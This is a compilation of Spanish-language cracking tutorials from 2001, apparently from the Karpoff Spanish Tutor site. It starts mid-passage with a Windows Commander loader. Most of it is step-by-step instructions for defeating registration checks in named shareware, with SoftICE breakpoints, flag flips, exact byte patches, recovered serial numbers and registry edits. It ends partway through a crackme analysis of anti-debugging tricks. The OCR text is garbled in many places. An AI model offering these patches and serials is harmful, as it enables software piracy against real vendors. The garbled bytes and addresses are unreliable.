Bien, como veréis he comentado un par de cosas. Lo primero es ke en eax+17 he colocado un 0. Esto es pq si no lo 
hacemos así al ir a la pantalla de "Acerca de windows commander" nos aparece una línea de 3 caracteres debajo del 
nombre ke viene regída por los 3 caracteres ke van desde eax+17 a eax+19 (ambos inclusive). Pero si ponemos un O 
en eax+17 el programa no escribirá nada, pues el código O significa "deja de escribir". Por eso en la línea 4D8BA9 
también hay un 0. De esta forma el programa deja de escribir a partir de ahí. Si lo quitamos veremos como el programa 
continua escribiendo caracteres hasta el final de la ventana como hacia anteriormente. Esto de ke el O significa "deja de 
escribir" lo podemos ver si buscamos la cadena SIN REGISTRAR en la memoria del programa sin crackear, ke acaba 
con un 0. 


Pues ya está. Ya tenemos el programa crackeado. En este caso el nombre será: "SnOp cracked version 2001". Pero a la 
hora de escribir cualquier cosa mejor ke lo hagáis desde un editor hexadecimal y busquéis el lugar de esta función. Allí 
os será fácil escribir directamente con el teclado sin tener ke saber cuáles son los códigos de las letras en ASCIT. 


Ahora ya podemos hacer el cargador ("loader") con toda la información ke tenemos. Será como sigue: 


L=2000 

F=wincmd32.EXE: 

O=wc452ldr.exe: 

P=4D8DBD/75,21/90,90: 

P=4D9040/0F, 84,AE,00,00,00/E9,AF,00,00,00,90: 
P=4D945B/74/EB: 

P=4F3BAB/74/EB: 

P=4EA908/0F, 84, 13,03,00,00/90,90,90,90,90,90: 


p=4D8B34/55,8B,EC,83,C4,F8,53,56,57,8B,F"9,89,45,F'C,89,15,2C,70,54,00,C7,45,F8, 14,00,00,00,8B,F7,85,F6,7C,1C 
,46,8B,5D,FC,8D,47,01,E8,53, 9F, F2,FF,8B,55,FC,03,D0,8B,C3,ES,BB,FF, FF,FF,43,4E,75,E8,8B,F7,85,F6,7C,2B,46 
8B,5D,FC,B8,08,00,00,00,E8,2F,9F,F2,FF,8B,D0,8B,C3,E8,76,FF, FF, FF,B8,00,01,00,00,E8,1C,9F,F2,FF,8A, 13,32, 
C2,88,03,43,4E,75,D9, FF,4D,F8,75,A8,5F,5E,5B,59,59,5D/05,17,00,00,00,C6,00,00,05,03,00,00,00,C6,00,53,40,C6, 
00,6E,40,C6,00,4F,40,C6,00,70,40,C6,00,20,40,C6,00,43,40,C6,00,72,40,C6,00,61,40,C6,00,63,40,C6,00,6B,40,C6, 
00,65,40,C6,00,64,40,C6,00,20,40,C6,00,56,40,C6,00,65,40,C6,00,72,40,C6,00,73,40,C6,00,69,40,C6,00,6F,40,C6, 


00,6E,40,C6,00,20,40,C6,00,32,40,C6,00,30,40,C6,00,30,40,C6,00,31,40,C6,00,20,40,C6,00,00,90: 
$ 


*Es un loader para el Risk! Process Patcher 


Finalmente deciros ke si nos lo queremos currar aún más podemos crear un fichero ke modifique el propio loader para 
ke modifique los bytes ke se escribirán en el nombre de modo ke cada usuario pueda personalizar su windows 
commander con su nombre. No lo he hecho, pero no es complicado. 


Nada más. Solo daros mi e-mail para dudas, correcciones, aclaraciones, quejas, felicitaciones... 


snopmailOterra.es 


SnOp 
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Programa: Winboost 2001 Estandart Edition 

PROTECCION: Serial. 

Objetivo: Buscar un Numero de Serie valido o parchar el Programa para ser usuario registrado 

Descripcion: 

Dificultad: Newbie 

DOWNLOAD: http://www.magellas.com/ 

Herramientas: Softice, IceDump 6.021 

CRACKER: Profesor_X FECHA: 20/02/2001 
INTRODUCCION 


Hola Amigos otro programa mas que analizamos, en este tutorial veremos como encontrar un numero de serie para 
todos los sharewares de la empresa Magellas software, una empresa que se especializa en desarrollar software y 
utilerias para Windows, ........ como podran ver aumente una nueva seccion que se llama : VALORACION DEL 
SOFTWARE en la cual pondremos la calificacion que se merece segun mi punto de vista, tomando en cuenta los 


siguientes parametros: 


1. sistema de proteccion 
2. Funcionalidad 
3. Calidad en programación 


AL ATAKE 


Comentario del Programa 


e Una utileria paraconfigurar muchas cosas de windows que no estan disponibles para todos, es compatible con 
windows 2000 


Objetivos 


1. Buscar un numero de serie para registrarnos 
2. Parchar el programa para ser usuario registrado 


Manos a la Obra 


Ahora lo primero es analizar con que esta hecho el Intenet Tweak que desde ahora lo llamaremos IT , lo analizaremos 
con una utileria muy buena que se llama Language 2000 v4.5.1.144 el que nos mostrará información realmente 
importante para la hora de atacar el programa; bueno el Language 2000 v4.5.1.144 nos mostrará los siguientes datos: 


19 C Archivos de programa Vintemet Tweak 2001 Vitweaks 


http: //w.nicrosott.com/visuale/ 


¡ASProtect /ASPack 
; exey Solodovnikov 
NUED: //www, aspack. com, 


:/ [we 


programa y ejecutemoslo, lo primero que sale es una ventana como esta: 


¡Welcome 


mmmm....como podemos ver nos aparecen tres botones.....si damos click en el boton que dice "REGISTER" nos 
mandara a otra ventana en la cual insertaremos nuestro nombre y cualquier numero 


ahora vamos y reiniciamos la PCera y cargamos el SOFTICE despues cargamos el IceDump 6.021, con el cual 
ocultaremos muy bien el SOFTICE para que no sea detectado, ejecutamos el programa e insertamos un nombre y 
numero de serie y antes de dar click en OK vamos y damos CONTROL D y ponemos un breakpoint BPX 
HMEMCPY , despues volvemos a dar CONTROL D y regresamos al programa en el cual damos click en el boton 
OK! y saltaremos inmediatamente al SOFTICE , damos F12 mas o menos 11 veces hasta que caemos en este parte del 


codigo: 


:004BED9B 8B55F8 mov edx, dword ptr [ebp-08] <-------- caemos aqui 
:004BED9E 8B45FC mov eax, dword ptr [ebp-04] <----------- DAMOS D EDX 
:004BEDA 1 E82AFDFFFEF call 004BEADO 

:004BEDA6 8D55FO0 lea edx, dword ptr [ebp-10] 

:004BEDA9 E85294F4FF call 00408200 

:004BEDAE 33CO0 xor eax, eax 

:004BEDBO 5A pop edx 

:004BEDB1 59 pop ecx 

:004BEDB2 59 pop ecX <ommmmmmmmmn DAMOS D ECX 

:004BEDB3 648910 mov dword ptr fs:[eax], edx 

:004BEDB6 6894FA4BO0O0 push 004BFA94 


:004BEDBB 8B45F4 mov eax, dword ptr [ebp-0C] 

:004BEDBE 8B55F0 mov edx, dword ptr [ebp-10] <=omomomooo=- DAMOS D EAX 
:004BEDC1 E8D24FF4FF call 00403D98 

:004BEDC6 0F851F010000 ¡ne 004BEEEB 

:004BEDCC 8B45F0 mov eax, dword ptr [ebp-10] 


saltamos a esta parte del COUEO FF FEEREFREREEREAAE ES A 


:004BF67F E81447F4FF call 00403D98 < DAMOS D EDX 


:004BF684 750A ¡ne 004BF690 < DAMOS R FL Z 


OK una vez puesto el codigo ahora va la explicacion de todo esto, como podemos ver caemos en la direccion 
004BED9B damos EFl0 una sola vez y caemos en :004BED9E posicionados ahi damos D EDX y podremos ver nuestro 


nombre !!!mmmm !!! interesante vamos por buen camino.....ok continuamos traceando con F10 hasta llegar a 
004BEDB2 damos D ECX y podremos ver algo muy inetresante......unos NUMETOS........ 417478292 .....mmmmm sera el numero de 


004BEDBE damos D EAX y vemos que aparece nuestro numero falso...mmmm...vamos muy bien....jejejejejeje.....sigamos traceando 
hacia abajo....hasta que llegamos a la direccion 004BF67F en la cual damos D EDX y vemos la ventana de datos y nos aperecen unos 


numero extraños 1X2K1-T562F-U0O87C-6R4U8 .......... y asi consecutivamente abajo aparecen varios....mmmmmm!!!!! OK! tomemos un 
lapiz y un papel los apuntamos...pero esperen .......... no salgan de SOFTICE ya que como pueden ver abajo de la direccion 004BF67F hay 
un salto condicional .... mmmmm JEJEJEJEJE!!!! .... que les parece si damos F10 una sola vez para pocisionarnos en la direccion de 


memoria 004BF684 ya estando ahi , ponemos en la ventana de comandos R FL Z ahora damos enter y despues borramos todos los break 
points con BC* y despues damos CONTRO D para salir del SOFTICE y que sorpresa nos aparece una ventana como esta: 


¡Welcome 


all Pp ahte 


This copy has been licensed to : 


profesorx | 


jejejejejejje creo que no fue necesario el numero de serie....... 3) ...ahora ya vieron como registramos el programa sin 
tener que meter ningun serial, R FL Z se usa para cambiar el sentido de los saltos, en este caso cuando nos 
posicionamos en el salto nos marca asi JUMP y con esa instruccion lo cambiamos a que no 
salte.....jejejejjejejjej,.............. ahora si queremos ver si funciona nuestro serial, debemos de buscar el archivo WIN.INI 
y borrar las siguientes lineas 


[WB] 
Owner=profesorx 


Registered=True 


para volver a ser usuario sin registrar......,,,1Insertamos nuestro numero y nombre y!!!!! funciona!!!!!! 


JEJEJEJEJEJE!!!!:D) CREO QUE ESTE ARROZ YA SE COCIO OTRA VEZ mas ....... PROGRAMA 
CRACKEADO....... 


Nota 


Recuerden que este metodo es una forma mas para registrara un programa y encontrar un numero de serie, si probaran con 
otros sharewarecitos de esta empresa es lo mismo..... Espero que les sirva de algo este tutorial para aumentar sus 
conocimientos en el arte del cracking....Soy humano y cometo errores, si encuentras uno házmelo saber OK. PROFESOR_X 


Saludos 


e Act MAgO 
e ¡TeD 

e VluGo 

e [DeK_0iN ] 
e Txeli 

e Kuato_Thor 
e CrkViz 

+ CODE_MEX 
e Metamorfer 
e Txotxo 

e Raziel 


e Turbop 


e Karpoff http://welcome.to/karpoff 


e Xasx de TNT! http://www.tntcrackers. ws 


e Viper ( creador de file insPEctor ) file insPEctor web site http:/ /www.finspec. swsites. net/ index. htm 


e Toda la people de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 


Clean UP 
Serial. 
Buscar un Numero de Serie valido 
Newbie 
http://www.worldlynx.net/pgerhart/ 
Softice 
Profesor_X FECHA: 20/02/2001 
INTRODUCCION 


Hola amigos otro programa mas que analizamos, en este tutorial veremos como encontrar un numero de serie para todos los 
sharewares de la empresa Paul Gerhart software, que verdaderamente es una proteccion de las faciles que he 
encontrado....jeeeje... WAKE UP.estos chavos de PAul Gerhart necesitan urgentemente alguien que les implemente una 
protección eficaz...;).....el programa que usaremos de ejemplo sera el llamado CleanUp v 1.9,....ya veran por que les digo que 
es super facil encontrar un serial.....jejejje...:) 


AL ATAKE 


Comentario del Programa 


e Una utileria para eleminar archivos no deseados en tu pc 


Lo que nos interesa...el programa es shareware con libre uso de 30 días, ....jejejjejeje, el programa tiene las 


siguientes protecciones: 


ACEPTA NUMERO DE SERIE Y LIMITE DE TIEMPO 


Objetivos 


1. Buscar un numero de serie para registrarnos 


Manos a la Obra 


Antes de abrir el programa lo analizamos con file insPEctor v4.0 el que nos mostrará información realmente 
importante a la hora de atacar el programa; bueno el file insPEctor nos mostrará los siguientes datos: 


e El programa está desarrollado en Microsoft Visual C++ V 5.0 
e No esta Empacado 


A continuación... cerramos file insPEctor v4.0 y abrimos CleanUp inmediatamente entramos al programa : 


CicanUp 


ahora vamos al menu file/register y nos aparecera la siguiente ventana : 


¡Registenmg 


en la cual insertare un nombre y codigo falso, ok! ahora damos click en el boton VALIDATE MY CODE y nos 
mada el mensaje '' NAME / CODE MIS-MATCH TRY AGAIN " 


ya vieron es una MESSAGE BOX , interesante , ok ahora den click en aceptar y otra vez inserten un name y codigo 
falso y antes de dar validate code, den CONTROL D y pongan un break point en MESAGEBOXA , vuelvan a dar 
CONTROL D y ahora si den click en el boton de VALIDATE MY CODE y saltamos directamente al soft 
ice.....damos f 12 una vez y aparece la MESAGEBOXA del programa diciendonos que error en el codigo, damos click 
en el boton de esa ventana y volmemos a saltar a el softice una vez ahi en la ventana de comandos ponemos: 

S 0 L FFFFFFFF "PROFESORX" <--- lo que esta entre comillas es el name que introducimos.. 


damos [enter] y vemos la ventana de datos y aparece nuestro name,mmmmm....:) bajamos unas tres lines en la 
ventana de datos y nos encontramos algo como esto: 


ACF4671C 


lo apuntamos y vamos a la opcion de register metemos el name y esos numeros presumiblemente nuestro codigo 


ya vieron que facil fue sacar el serial, y asi es para todos los productos de esta empresa....deberas que esta 


empresa necesita urgentemente un sistema de proteccion mas eficiente....;).... 
JEJEJEJEJEJE!!!!:D) CREO QUE ESTE ARROZ YA SE COCIO OTRA VEZ...... PROGRAMA 
CRACKEADO....... 

Nota 


Recuerden que este metodo es la forma mas burda pero funcional apra encontrar un numero de serie, si probaran con otros 
sharewarecitos verian cuantos se pueden crackear con este metodo, Espero que les sirva de algo este tutorial para 
aumentar sus conocimientos en el arte del cracking....Soy humano y cometo errores, si encuentras uno házmelo saber 
OK. PROFESOR_X 


Saludos 


e. Act MAgO 
e [DeK_OiN ] 


e Txeli 


e Kuato_Thor 
e CrkViz 

e CODE_MEX 
e Metamorfer 
e Txotxo 

e Raziel 

e Turbop 


e Karpoff http://welcome.to/karpoff 


e Xasx de TNT! http://www.tntcrackers. ws 


e Viper ( creador de file insPEctor ) file insPEctor web site http:/ /www.finspec. swsites. net/ index. htm 


e Toda la people de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 


Life Explosion Millenium Edition Screensaver v 6.1 


Serial. 


Buscar un Numero de Serie valido 


Newbie 
http://www.controlzed.com/areality/ 


Softice 


Profesor_X FECHA: 20/02/2001 


INTRODUCCION 


Hola Amigos otro programa mas que analizamos, en este tutorial veremos como encontrar un 
numero de serie a Life Explosion Millenium Edition v 6.1 Screensaver, una empresa que se 
especializa en desarrollar Screensaver para windows, ........ como podran ver aumente una nueva 
seccion que se llama : VALORACION DEL SOFTWARE en la cual pondremos la calificacion que se 
merece segun mi punto de vista, tomando en cuenta los siguientes parametros: 


1. sistema de proteccion 


2. Funcionalidad 


3. Calidad en programación 


AL ATAKE 


Comentario del Programa 


e Un Screensaver verdaderamente bueno, unos efectos que a mi parecer son buenos. ...deberias de tenerlo....) 


Objetivos 


1. Buscar un numero de serie para registrarnos 


Manos a la Obra 


Ahora lo primero es analizar con que esta hecho el Life Explosion Millenium Edition v 6.1 Screensaver que desde 


ahora lo llamaremos LEM, lo analizaremos con una utileria muy buena que se llama Language 2000 v4.5.1.144 el que 
nos mostrará información realmente importante para la hora de atacar el programa; bueno el Language 2000 
v4.5.1.144 nos mostrará los siguientes datos: 


é CAWINDOWSLife_Explosion_ME.scr 


[Life_Explosion_ME.scr 
check for new version at http: //controlzed.c 
A 


¡Life Explosion 


empezemos,iniciemos el 
SoftICE e instalemos el programa y nos vamos a control panel > screensaver y seleccionamos el LEM y vamos a 
la opcion de configurar y nos aprecera esta ventana: 


Register reminder 


Already regisered? 


mmmm....como podemos ver nos aparece en la parte inferior de la ventana unas caption box en las cuales insertaremos 
nuestro nombre y numero de serie como se ve en la pantalla, y damos click en SUBMIT y nos aparece una ventanita 
como esta: 


¡Something strange... 


ok!!! ahora damos click en cancelar y como podemos ver tiene aspecto de una MESSAGEBOX mmmmmm!! ok! 
ahora demos CONTROL D y saltamos al SOFTICE en el cual pondremos un break point en BPX MESSAGEBOXA 
y volvemos a dar CONTROL D y ahora si regresamos a la ventana del LEM y damos click en SUBMIT y saltamos 
inmediatamente al SOFTICE damos F12 una sola vez y saltamos a la ventana de error, damos click en el boton de 
cancelar y saltamos otra vez al SOFTICE en el cual caemos en el codigo siguiente: 


:0040B73E ES5D8A0BOO Call 004C41A0 


:0040B743 83F804 cmp eax, 00000004 <--caemos aqui veran que facil 
:0040B746 7403 je 0040B74B 

:0040B748 48 dec eax 

:0040B749 752C jne 0040B777 


ok!!!! una vez ahi enpesamos a ver lo que contiene los acumuladores y cuando damos D ESP , vemos la ventana de 
datos y nos damos cuenta de unos numeritos como estos remarcados en rojo en la direccion de memorial virtual: 


016£:0077f4ES 0089 0012 1545 1548 1222 2222 ........ 0002030 


| Congratulations! 


y donde diablos se grabo nuestro numero de registro....... mmmmm..buena pregunta...pues se guardo en el reg edit en la 
siguiente seccion: 


[HKEY_CURRENT_USERSoftwareWControl-Zed GroupWMLife Explosion] 
"InstallDir"="C:WArchivos de programaWControl ZedWLife Explosion" 
"RegisteredTo"="profesor x" 

"RegistrationKey"="0002030" 


si borramos los valores de RegisteredTo y RegistrationKey volveremos a ser usuarios no registrados..... 


Nota 


Espero que les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking....Soy humano y cometo 
errores, si encuentras uno házmelo saber OK. PROFESOR _X 


Saludos 


e Act MAgO 
e. ¡TeD 

e VluGo 

+ [DeK_OiN ] 
e Txeli 

e Kuato_Thor 
e CrkViz 

+ CODE_MEX 
e Metamorfer 
e Txotxo 

e Raziel 


e Turbop 


e Karpoff http://welcome.to/karpoff 


e Xasx de TNT! http://www.tntcrackers. ws 


e Viper ( creador de file insPEctor ) file insPEctor web site http:/ /www.finspec. swsites. net/ index. htm 


e Toda la people de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 
Programa: — Rippling Water Screensaver v 2.1 


PROTECCION: Serial. 

Objetivo: parchar el Programa para ser usuario registrado 

Descripcion: Un Screensaver verdaderamente bueno, unos efectos que a mi parecer son excelentes 
Dificultad: Newbie 

DOWNLOAD: http://www.controlzed.com/areality/ 

Herramientas: Softice 

CRACKER: Profesor_X FECHA: 20/02/2001 


INTRODUCCION 


Hola Amigos otro programa mas que analizamos, en este tutorial veremos como parchar el Rippling 
Water Screensaver v 2.1, de la empresa Ambient reality software una empresa que se especializa en 
desarrollar Screensaver para windows, ........como podran ver aumente una nueva seccion que se 
llama : VALORACION DEL SOFTWARE en la cual pondremos la calificacion que se merece segun mi 
punto de vista, tomando en cuenta los siguientes parametros: 


1. sistema de proteccion 
2. Funcionalidad 
3. Calidad en programación 


AL ATAKE 


Ahora lo primero es analizar con que esta hecho el Rippling Water Screensaver v 2.1 que desde ahora lo 
llamaremos RWS, lo analizaremos con una utileria muy buena que se llama Language 2000 v4.5.1.144 el que nos 
mostrará información realmente importante para la hora de atacar el programa; bueno el Language 2000 v4.5.1.144 
nos mostrará los siguientes datos: 


$ CAWINDOWSRippling_Water. scr 


SoftICE e instalemos el programa y nos vamos a control panel > screensaver y seleccionamos el RWS y vamos a 
la opcion de configurar y nos aparecera esta ventana: 


Ripping Water Screen Saver - UNREGISTEREDI! 


Enero 31, 16:1239. 


mmmm....como podemos ver nos aparece en la parte inferior de la ventana un STRING que dice PLEASE 
REGISTER...mmmmm.. demos click en esa seccion y nos mada a la siguiente ventana : 


Jur tegistrabon service use a VeriSign pei Se 
transactions. VeniSi a deprime 
cure transactions and ma soy Erro on pe 


cediicales companias. 
, of this means that your credl card information is sent to the credk 
card processor in a very secure manmes, s0 that NOBODY cansec it. 


ok ahora en las caption box insertamos nuestro nombre y cualquier numero de serie, despues de eso damos click en 
SUBMIT y nos manda el mensaje de error : 


ok ahora damos click en aceptar e 
os otra vez nuestros datos pero antes de dar click damos CONTROLD y saltamos al SOFTICE y ponemos 
un break point en BPPX MESSAGEBOXA ok! damos CONTROL D otra vez y regresamos al programa , ahora si 
damos click en SUBMIT y saltamos inmediatamente al SOFTICE damos F12 una sola vez y caemos en la siguiente 
parte del codigo: 


:0040A3D4 FF7510 push [ebp+10] 

:0040A3D7 FF750C push [ebp+0C] 

:0040A3DA FF7508 push [ebp+08] 

:0040A3DD ES8D2010000 call 0040A5B4 <--llamada que nos interesa 
:0040A3E2 83C40C add esp, 0000000C 

:0040A3E5 85CO0 test eax, eax 

:0040A3E7 7524 ¡ne 0040A40D 

:0040A3E9 6A00 push 00000000: 


CAEMOS AQUI 
:0040A3FE 8B55B8 mov edx, dword ptr [ebp-48] 
:0040A401 64891500000000 mov dword ptr fs:[00000000], edx 
:0040A408 E9A2010000 ¡mp 0040 ASAF 


ok!!!! una vez ahi subimos unas cuantas lineas y podemos ver una salto JNZ y dos lineas arriba una CALL 
...mmmmm!!! interesante......... ok!! borremos todos los break points y pongamos un nuevo break point en 0040A3DD 
y regresamos al programa insertamos los datos nuevamente damos clik en SUBMIT y caemos directamente en esa 
direccion de memoria, como en este tutorial hablaremos de como parcharlo..les dejo de tarea buscar el serial siguiendo 
esa CALL, ok ! continuemos,.. damos F8 para posicionarnos en la primera instruccion que ejecutara esa CALL y 
caemos aqui: 


:0040A5B4 55 push ebp <----- caemos aqui 
:0040A5B5 SBEC mov ebp, esp 

:0040A5B7 81C4FSFEFFFE add esp, FFFFFEFS 
:0040A5BD C745F821000000 mov [ebp-08], 00000021 
:0040A5C4 33C0 xor eax, eax 

:0040A5C6 8945FC mov dword ptr [ebp-04], eax 
:0040A5C9 EB10 ¡mp 0040A5DB 


ok ahora como podemos ver esa es la llamada que se encarga de verificar el numero de serie , si es verdadero manda 
valor en EAX = 1, si no mandan un valor en EAX = 0, ok!! lo que hariamos es modificar esas instrucciones que llaman 
esa call para que mande EAX con valor de 1, mmmmm.... abrimos una copia del RWS en el editor hexadecimal y nos 
vamos al offset 9BBA y cambiaremos: 


00009BB2|5DC3 FEFF FFC7 45F8 
00009BC0/2100 0000 33C0 8945 FCEB 108B 550C|!.,.3.. 
Y) FCOF BEO4 0A01 45F8 FF45 FCFF 1. 


FEFF FFC7 45F8 
2100 0000 3300 8945 FCEB 108B 550C 


NOTA: para todos los que estan en las nubes......lo que hicimos fue cambiar las instrucciones : 
b801000000 "HEXADECIMAL" 

es igual a 

MOV EAX,001 " INSTRUCCION EN ENSAMBLADOR" 

C3 "hexadecimal" 

es igual a 

RET "INSTRUCCION EN ENSAMBLADOR" 


DESPUES DE ESTA NOTA AHORA SI PODEMOS DECIR.... 


Nota 


Espero que les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking....Soy humano y cometo 
errores, si encuentras uno házmelo saber OK. PROFESOR _X 


Saludos 


e. Act MAgO 
e. ¡TeD 

e VluGo 

+ [DeK_OiN ] 
e Txeli 

e Kuato_Thor 
e CrkViz 

+ CODE_MEX 
e Metamorfer 
e Txotxo 

e Raziel 


e Turbop 


e Karpoff http://welcome.to/karpoff 


e Xasx de TNT! http://www. tntcrackers. ws 


e Viper ( creador de file insPEctor ) file insPEctor web site http:/ /www.finspec. swsites. net/ index. htm 


e Toda la people de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 
Programa: — Tutorial del crackme +3 de NI2 


PROTECCION: Leed y lo sabreis 
Objetivo: 
Descripcion: Otro endiablado crackme de NI2 :) 
Dificultad: Newbie 
DOWNLOAD: Mets // TO. tO/Ni2 
SOFTICE, Hex WorkShop, IDA y muuuuucha 
Pe O documentación. 
CRACKER: Crick FECHA: 20/02/2001 


INTRODUCCION 


Si tuviera que elegir una palabra para definir este crackme sería: "DIDÁCTICO". 

Ni2, en su afán por enseñarnos, ha creado este crackme que, como él dice, "Si no tienes ni idea sobre como un depurador funciona y sobre nociones basicas de Windows 
(con respecto al SEH), este crackme te sera imposible resolverlo." Y es completamente cierto. Así que lo primero que hay que hacer es documentarse sobre el tema. Al 
final os doy algunos links a las fuentes de información que he consultado. 


Algunas observaciones: 

En el leeme.txt que acompaña al crackme, Ni2 nos dice que no es necesaria la fuerza bruta. Bueno, esto no es del todo cierto, ya que para pasar el primer test de nuestro 
serial entran en juego cuatro caracteres del serial que con un pequeño "FB" y algo de intuición, sale rápidamente. 

También dice que no lleva protección Anti-Nada... tampoco es cierto. Hay una zona de código que redirecciona la INT 1 (usada por SICE) y por lo tanto al llegar aquí hay 
que hacerle un bypass para poder seguir trazando : 


AL ATAKE 


Después de conseguir abundante información sobre el modo de depuración del 386 y sobre el "Manejo Estructurado de 
Excepciones" ("Structured Exception Handling" (SEH)) de Windows, desensamblamos el programa con IDA (siguiendo el consejo 
de Ni2 en su txt) y pronto nos damos cuenta de las zonas de código interesantes. 


Por ejemplo: 


00401320 BB 28 13 40 00 mov ebx, offset dword_401328 

00401325 FF E3 jmp ebx ; Indirect Near Jump 

00401327 OF db OFh 

00401328 OF 23 F8 BF dword_401328 dd OBFF8230Fh ; DATA XREF: .text:00401320 
0040132C 74 12 40 00 dd offset dword_401272+2 


Si habeis leído el txt del crackme vereis que Ni2 dice que ha ofuscado una instrucción. Pues está aquí, en 401328. Con IDA nos 
ponemos en esa dirección le decimos que "undefine" la zona 401328-40132F y luego en 401328 le decimos a IDA que eso es 
código. Este es el resultado: 


00401320 BB 28 13 40 00 mov ebx, offset loc_401328 
00401325 FF E3 jmp ebx ; Indirect Near Jump 


00401327 OF db OFh ; Ni2 Malo 

00401328 loc_401328: ; DATA XREF: .text:00401320 
00401328 OF 23 F8 mov dr7, eax 

0040132B BF 74 12 40 00 mov edi, offset dword_401274 


Como veis había ocultado la carga del registro DR7 (Debug Control Register) 


Otra zona curiosa es esta: 


00401272 5A db 5Ah ; Z 

00401273 5A db 5Ah ; Z 

00401274 8E 73 14 8F A6 98+ db 8Eh, 73h, 14h, 8Fh, 0A6h, 98h, 6, 5Fh, 1Eh, 89h, 44h 
00401274 06 5F 1E 89 44 F4+ ; DATA XREF: .text:0040132B.Oo 

00401274 4F 57 5D 2D 3E 5A+ ; .text:00401360.0 

00401274 46 5E 5D 52 59 5A+ db 0F4h, 4Fh, 57h, 5Dh, 2Dh, 3Eh, 5Ah, 46h, 5Eh, 5Dh, 52h 
00401274 3D 2A 34 4D 5B 4A+ db 59h, 5Ah, 3Dh, 2Ah, 34h, 4Dh, 5Bh, 4Ah, 5Bh, 53h, 48h 
00401274 5B 53 48 5C€ 50 1F+ db 5Ch, 50h, 1Fh, 51h, 71h, 7Ch, 77h, 76h, 71h, 38h, 3Fh 
00401274 51 71 7C 77 76 71+ db 67h, 7Ch, 75h, 77h, 30h, 3%h, 4Dh, 70h, 6Bh, 39h, “Eh 
00401274 38 3F 67 7C 75 77+ db 71h, 71h, 6Eh, 34h, 77h, 71h, G6Eh, 34h, 7YEh, 3Eh, 7Dh 
00401274 30 39 4D 70 6B 39+ db 71h, 7Dh, 6Bh, 7Eh, 73h, 7Ah, 6Ch, 39h, 75h, 71h, 7Ah 
00401274 7F 71 71 6E 34 77+ db 39h, 43h, 76h, 70h, 7Dh, 7Bh, 68h, 6Dh, 3%h, 63h, 70h 
00401274 71 6E 34 7E 3E 7D+ db 6Ch, 72h, 34h, 25h, 37h, 19h, OACh, 87h, OCh, 5%h, 14h 
00401274 71 7D 6B 7E 73 7A+ db 4Fh, 74h, 19h, OB5h, 8Ah, 3Eh, 5%h, 14h, OE0h, OCEh 
00401274 6C 39 75 71 7A 39+ db 7Dh, 9Bh, 1Ah, 1Eh, 19h, 14h, 1Fh, 8Eh, 9Ah, ODOh, 1Bh 
004012EC 6A 00 push O 
004012EE E8 1D 01 00 00 call 3j_PostQuitMessage ; Call Procedure 
004012F3 EB 17 jmp short loc_40130C ; Jump 


Aquí también tenemos que jugar un poquito con IDA para que nos muestre bien la zona 401274-4012EB, son 120 (78h) bytes 


encriptados que como podreis suponer, los que conoceis las "artes" de N12, contiene el código que nos mostrará el mensajito de 
CRACKME RESOLVED !!! 


Bien, vamos a analizar lo que hace este programa desde el principio: 


00401000 6A 00 public start 
00401000 start proc near 
00401000 push O 


00401002 E8 27 04 00 00 call 3j_GetModuleHandleA ; Call Procedure 
00401007 A3 AO 20 40 00 mov dword_4020A0, eax 

0040100C E8 90 03 00 00 call sub_4013A1 ; Call Procedure 
00401011 E8 B2 01 00 00 call sub_4011C8 ; Call Procedure 
00401016 6A 00 push 0 

00401018 68 35 10 40 00 push offset sub_401035 

0040101D 6A 00 push O 

0040101F 68 00 20 40 00 push offset aMydialog ; "MyDialog" 
00401024 FF 35 AO 20 40 00 push dword_4020A0 

0040102A E8 C3 03 00 00 call j_DialogBoxParamA ;¿ Call Procedure 
0040102F 50 push eax 

00401030 E8 F3 03 00 00 call 3_ExitProcess ; Call Procedure 
00401030 start endp 


Este es el programa principal. Después de la típica llamada a GetModuleHandle se llama a una rutina en 4013A1 que comprueba 
si estamos ejecutándolo bajo Windows 9x ó ME y nos dará un error en caso contrario. 


A continuación se llama a la rutina que hay en 401108. 
Esto es lo que hace: 


004011C8 60 pusha ; Push all General Registers 
004011C9 52 push edx 

004011CA OF 01 4C 24 FE sidt [esp-2] ; Store Interrupt Descriptor Table Register 
004011CF 5A pop edx 

004011D0 83 C2 0C add edx, 0OCh ; Add 

004011D3 8B 1A mov ebx, [edx] 

004011D5 66 8B 5A FC mov bx, [edx-4] 

004011D9 89 1D 99 20 40 00 mov dword_402099, ebx 
004011DF BF OE 13 40 00 mov edi, offset loc_40130E 
004011E4 66 89 7A FC mov [edx-4], di 

004011E8 C1 CF 10 ror edi, 10h ; Rotate Right 
004011EB 66 89 7A 02 mov [edx+2], di 

004011Er 61 popa ; Pop all General Registers 
